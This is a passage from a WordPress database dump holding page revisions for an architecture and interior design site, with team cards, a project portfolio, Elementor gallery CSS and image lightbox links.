					</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/christine-eve/\">\n										Christine eve										\n																		</a>\n																	</h2>\n															<p>\n									Interior designer								</p>\n						<!-- Avata -->\n											    <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n                            	<img src=\"https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-01.jpg\" alt=\"Mike Hardson\">\n					    						</a>\n						<!-- list Icon -->\n									<ul> \n																						<li>\n													<a href=\"https://twitter.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.facebook.com/ovatheme.envato\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.pinterest.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n																						<li>\n													<a href=\"https://www.instagram.com\" target=\"_blank\" rel=\"noopener\">\n													</a>\n												</li>\n									</ul>\n					<!-- Info -->\n                        									<h2>\n																		 <a href=\"https://bauhaus.futuremediatrix.com/team/mike-hardson/\">\n										Mike Hardson										\n																		</a>\n																	</h2>\n															<p>\n									Architecture								</p>\n															<img width=\"95\" height=\"110\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/01.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"96\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/02.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"88\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/03.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"107\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png\" alt=\"\" loading=\"lazy\" srcset=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04.png 107w, https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/04-100x100.png 100w\" sizes=\"(max-width: 107px) 100vw, 107px\" />															\n															<img width=\"105\" height=\"109\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/05.jpg.png\" alt=\"\" loading=\"lazy\" />															\n															<img width=\"106\" height=\"108\" src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/06.png\" alt=\"\" loading=\"lazy\" />','About','','inherit','closed','closed','','38-revision-v1','','','2023-09-22 08:33:43','2023-09-22 08:33:43','',38,'https://bauhaus.futuremediatrix.com/?p=4848',0,'revision','',0),(4849,3,'2023-09-22 08:35:21','2023-09-22 08:35:21','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                    <li data-slug=\".architect\">\n                        Architect                    </li>\n                    <li data-slug=\".design\">\n                        Design                    </li>\n                    <li data-slug=\".interior\">\n                        Interior                    </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n        <h4>no data</h4>\n			<style>/*! elementor-pro - v3.8.1 - 07-11-2022 */\n.elementor-gallery__container{min-height:1px}.elementor-gallery-item{position:relative;overflow:hidden;display:block;text-decoration:none;border:solid var(--image-border-width) var(--image-border-color);border-radius:var(--image-border-radius)}.elementor-gallery-item__content,.elementor-gallery-item__overlay{height:100%;width:100%;position:absolute;top:0;left:0}.elementor-gallery-item__overlay{mix-blend-mode:var(--overlay-mix-blend-mode);-webkit-transition-duration:var(--overlay-transition-duration);-o-transition-duration:var(--overlay-transition-duration);transition-duration:var(--overlay-transition-duration);-webkit-transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;-o-transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color,-webkit-transform}.elementor-gallery-item__image.e-gallery-image{-webkit-transition-duration:var(--image-transition-duration);-o-transition-duration:var(--image-transition-duration);transition-duration:var(--image-transition-duration);-webkit-transition-property:-webkit-filter,-webkit-transform;transition-property:-webkit-filter,-webkit-transform;-o-transition-property:filter,transform;transition-property:filter,transform;transition-property:filter,transform,-webkit-filter,-webkit-transform}.elementor-gallery-item__content{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:var(--content-justify-content,center);-ms-flex-pack:var(--content-justify-content,center);justify-content:var(--content-justify-content,center);-webkit-box-align:center;-ms-flex-align:center;align-items:center;text-align:var(--content-text-align);padding:var(--content-padding)}.elementor-gallery-item__content>div{-webkit-transition-duration:var(--content-transition-duration);-o-transition-duration:var(--content-transition-duration);transition-duration:var(--content-transition-duration)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(2){-webkit-transition-delay:calc(var(--content-transition-delay) / 3);-o-transition-delay:calc(var(--content-transition-delay) / 3);transition-delay:calc(var(--content-transition-delay) / 3)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(3){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 2);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 2);transition-delay:calc(var(--content-transition-delay) / 3 * 2)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(4){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 3);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 3);transition-delay:calc(var(--content-transition-delay) / 3 * 3)}.elementor-gallery-item__description{color:var(--description-text-color,#fff);width:100%}.elementor-gallery-item__title{color:var(--title-text-color,#fff);font-weight:700;width:100%}.elementor-gallery__titles-container{display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;-webkit-box-pack:var(--titles-container-justify-content,center);-ms-flex-pack:var(--titles-container-justify-content,center);justify-content:var(--titles-container-justify-content,center);margin-bottom:20px}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:before{background-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:before{background-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:before{border-color:var(--galleries-pointer-bg-color-hover);border-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:after{border-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:before{border-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:var(--galleries-pointer-border-width);border-right-width:0;border-top-width:0}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:after{border-left-width:0;border-bottom-width:0;border-right-width:var(--galleries-pointer-border-width);border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:0;border-right-width:0;border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:after{border-left-width:0;border-bottom-width:var(--galleries-pointer-border-width);border-right-width:var(--galleries-pointer-border-width);border-top-width:0}.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:after,.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:before,.elementor-gallery__titles-container .e--pointer-overline .elementor-item:before,.elementor-gallery__titles-container .e--pointer-underline .elementor-item:after{height:var(--galleries-pointer-border-width)}.elementor-gallery-title{--space-between:10px;cursor:pointer;color:#6d7882;font-weight:500;position:relative;padding:7px 14px;-webkit-transition:all .3s;-o-transition:all .3s;transition:all .3s}.elementor-gallery-title--active{color:#495157}.elementor-gallery-title:not(:last-child){margin-right:var(--space-between)}.elementor-gallery-item__title+.elementor-gallery-item__description{margin-top:var(--description-margin-top)}.e-gallery-item.elementor-gallery-item{-webkit-transition-property:all;-o-transition-property:all;transition-property:all}.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-bottom,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-left,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-right,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-top,.e-gallery-item:hover .elementor-gallery__item-overlay-bg,.e-gallery-item:hover .elementor-gallery__item-overlay-content,.e-gallery-item:hover .elementor-gallery__item-overlay-content__description,.e-gallery-item:hover .elementor-gallery__item-overlay-content__title{opacity:1}a.elementor-item.elementor-gallery-title{color:var(--galleries-title-color-normal)}a.elementor-item.elementor-gallery-title.elementor-item-active,a.elementor-item.elementor-gallery-title.highlighted,a.elementor-item.elementor-gallery-title:focus,a.elementor-item.elementor-gallery-title:hover{color:var(--galleries-title-color-hover)}a.elementor-item.elementor-gallery-title.elementor-item-active{color:var(--gallery-title-color-active)}.e-con-inner>.elementor-widget-gallery,.e-con>.elementor-widget-gallery{width:var(--container-widget-width,100%)}</style>		\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-1.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-1\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxMiwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTEuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-2.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-2\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxMywidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTIuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-3.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-3\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxNCwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTMuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-4.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-4\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxNSwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTQuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-5.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-5\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxNiwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTUuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-6.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-6\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxNywidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTYuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-7.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-7\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxOCwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTcuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>','Residential','','inherit','closed','closed','','560-revision-v1','','','2023-09-22 08:35:21','2023-09-22 08:35:21','',560,'https://bauhaus.futuremediatrix.com/?p=4849',0,'revision','',0),(4850,3,'2023-09-22 08:35:21','2023-09-22 08:35:21','<h3>our recent work</h3>\n														<h2>\n								 Introducing outstanding projects							</h2>\n                        <ul>\n                <li data-filter=\"*\">\n                    All                </li>\n                    <li data-slug=\".architect\">\n                        Architect                    </li>\n                    <li data-slug=\".design\">\n                        Design                    </li>\n                    <li data-slug=\".interior\">\n                        Interior                    </li>\n            </ul>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial-2/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/greater-commercial-390x473.jpg\" alt=\"Greater commercial\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/greater-commercial/\" >\n				Greater commercial\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room-2/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/cozy-living-room-390x473.jpg\" alt=\"Cozy living room\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/cozy-living-room/\" >\n				Cozy living room\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers-2/\" >\n				Richard Rogers\n							</a>\n		</h3>\n		<!-- Image -->\n			    <a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n	    	<img src=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2022/06/Richard-Rogers-390x473.jpg\" alt=\"Richard Rogers\">\n	    		</a>\n	<!-- Info -->\n		<!-- Category -->\n				<a href=\"https://bauhaus.futuremediatrix.com/category_project/design/\" title=\"Design\">Design</a>	\n		<h3>\n					    	<a href=\"https://bauhaus.futuremediatrix.com/project/richard-rogers/\" >\n				Richard Rogers\n							</a>\n		</h3>\n        <h4>no data</h4>\n			<style>/*! elementor-pro - v3.8.1 - 07-11-2022 */\n.elementor-gallery__container{min-height:1px}.elementor-gallery-item{position:relative;overflow:hidden;display:block;text-decoration:none;border:solid var(--image-border-width) var(--image-border-color);border-radius:var(--image-border-radius)}.elementor-gallery-item__content,.elementor-gallery-item__overlay{height:100%;width:100%;position:absolute;top:0;left:0}.elementor-gallery-item__overlay{mix-blend-mode:var(--overlay-mix-blend-mode);-webkit-transition-duration:var(--overlay-transition-duration);-o-transition-duration:var(--overlay-transition-duration);transition-duration:var(--overlay-transition-duration);-webkit-transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;transition-property:mix-blend-mode,opacity,background-color,-webkit-transform;-o-transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color;transition-property:mix-blend-mode,transform,opacity,background-color,-webkit-transform}.elementor-gallery-item__image.e-gallery-image{-webkit-transition-duration:var(--image-transition-duration);-o-transition-duration:var(--image-transition-duration);transition-duration:var(--image-transition-duration);-webkit-transition-property:-webkit-filter,-webkit-transform;transition-property:-webkit-filter,-webkit-transform;-o-transition-property:filter,transform;transition-property:filter,transform;transition-property:filter,transform,-webkit-filter,-webkit-transform}.elementor-gallery-item__content{display:-webkit-box;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-ms-flex-direction:column;flex-direction:column;-webkit-box-pack:var(--content-justify-content,center);-ms-flex-pack:var(--content-justify-content,center);justify-content:var(--content-justify-content,center);-webkit-box-align:center;-ms-flex-align:center;align-items:center;text-align:var(--content-text-align);padding:var(--content-padding)}.elementor-gallery-item__content>div{-webkit-transition-duration:var(--content-transition-duration);-o-transition-duration:var(--content-transition-duration);transition-duration:var(--content-transition-duration)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(2){-webkit-transition-delay:calc(var(--content-transition-delay) / 3);-o-transition-delay:calc(var(--content-transition-delay) / 3);transition-delay:calc(var(--content-transition-delay) / 3)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(3){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 2);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 2);transition-delay:calc(var(--content-transition-delay) / 3 * 2)}.elementor-gallery-item__content.elementor-gallery--sequenced-animation>div:nth-child(4){-webkit-transition-delay:calc(var(--content-transition-delay) / 3 * 3);-o-transition-delay:calc(var(--content-transition-delay) / 3 * 3);transition-delay:calc(var(--content-transition-delay) / 3 * 3)}.elementor-gallery-item__description{color:var(--description-text-color,#fff);width:100%}.elementor-gallery-item__title{color:var(--title-text-color,#fff);font-weight:700;width:100%}.elementor-gallery__titles-container{display:-webkit-box;display:-ms-flexbox;display:flex;-ms-flex-wrap:wrap;flex-wrap:wrap;-webkit-box-pack:var(--titles-container-justify-content,center);-ms-flex-pack:var(--titles-container-justify-content,center);justify-content:var(--titles-container-justify-content,center);margin-bottom:20px}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item:before{background-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container:not(.e--pointer-framed) .elementor-item.elementor-item-active:before{background-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:before{border-color:var(--galleries-pointer-bg-color-hover);border-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item:after{border-color:var(--galleries-pointer-bg-color-hover)}.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:after,.elementor-gallery__titles-container.e--pointer-framed .elementor-item.elementor-item-active:before{border-color:var(--galleries-pointer-bg-color-active)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:var(--galleries-pointer-border-width);border-right-width:0;border-top-width:0}.elementor-gallery__titles-container.e--pointer-framed.e--animation-draw .elementor-item:after{border-left-width:0;border-bottom-width:0;border-right-width:var(--galleries-pointer-border-width);border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:before{border-left-width:var(--galleries-pointer-border-width);border-bottom-width:0;border-right-width:0;border-top-width:var(--galleries-pointer-border-width)}.elementor-gallery__titles-container.e--pointer-framed.e--animation-corners .elementor-item:after{border-left-width:0;border-bottom-width:var(--galleries-pointer-border-width);border-right-width:var(--galleries-pointer-border-width);border-top-width:0}.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:after,.elementor-gallery__titles-container .e--pointer-double-line .elementor-item:before,.elementor-gallery__titles-container .e--pointer-overline .elementor-item:before,.elementor-gallery__titles-container .e--pointer-underline .elementor-item:after{height:var(--galleries-pointer-border-width)}.elementor-gallery-title{--space-between:10px;cursor:pointer;color:#6d7882;font-weight:500;position:relative;padding:7px 14px;-webkit-transition:all .3s;-o-transition:all .3s;transition:all .3s}.elementor-gallery-title--active{color:#495157}.elementor-gallery-title:not(:last-child){margin-right:var(--space-between)}.elementor-gallery-item__title+.elementor-gallery-item__description{margin-top:var(--description-margin-top)}.e-gallery-item.elementor-gallery-item{-webkit-transition-property:all;-o-transition-property:all;transition-property:all}.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-bottom,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-left,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-right,.e-gallery-item.elementor-animated-content .elementor-animated-item--enter-from-top,.e-gallery-item:hover .elementor-gallery__item-overlay-bg,.e-gallery-item:hover .elementor-gallery__item-overlay-content,.e-gallery-item:hover .elementor-gallery__item-overlay-content__description,.e-gallery-item:hover .elementor-gallery__item-overlay-content__title{opacity:1}a.elementor-item.elementor-gallery-title{color:var(--galleries-title-color-normal)}a.elementor-item.elementor-gallery-title.elementor-item-active,a.elementor-item.elementor-gallery-title.highlighted,a.elementor-item.elementor-gallery-title:focus,a.elementor-item.elementor-gallery-title:hover{color:var(--galleries-title-color-hover)}a.elementor-item.elementor-gallery-title.elementor-item-active{color:var(--gallery-title-color-active)}.e-con-inner>.elementor-widget-gallery,.e-con>.elementor-widget-gallery{width:var(--container-widget-width,100%)}</style>		\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-1.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-1\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxMiwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTEuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-2.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-2\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxMywidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTIuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-3.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-3\" e-action-hash=\"#elementor-action%3Aaction%3Dlightbox%26settings%3DeyJpZCI6NDgxNCwidXJsIjoiaHR0cHM6XC9cL2JhdWhhdXMuZnV0dXJlbWVkaWF0cml4LmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAyM1wvMDVcL3Jlc2lkZW50aWFsLTMuanBnIiwic2xpZGVzaG93IjoiYWxsLTI5NmYwNjkifQ%3D%3D\">\n														</a>\n							<a href=\"https://bauhaus.futuremediatrix.com/wp-content/uploads/2023/05/residential-4.jpg\" data-elementor-open-lightbox=\"yes\" data-elementor-lightbox-slideshow=\"all-296f069\" data-elementor-lightbox-title=\"residential-4\" 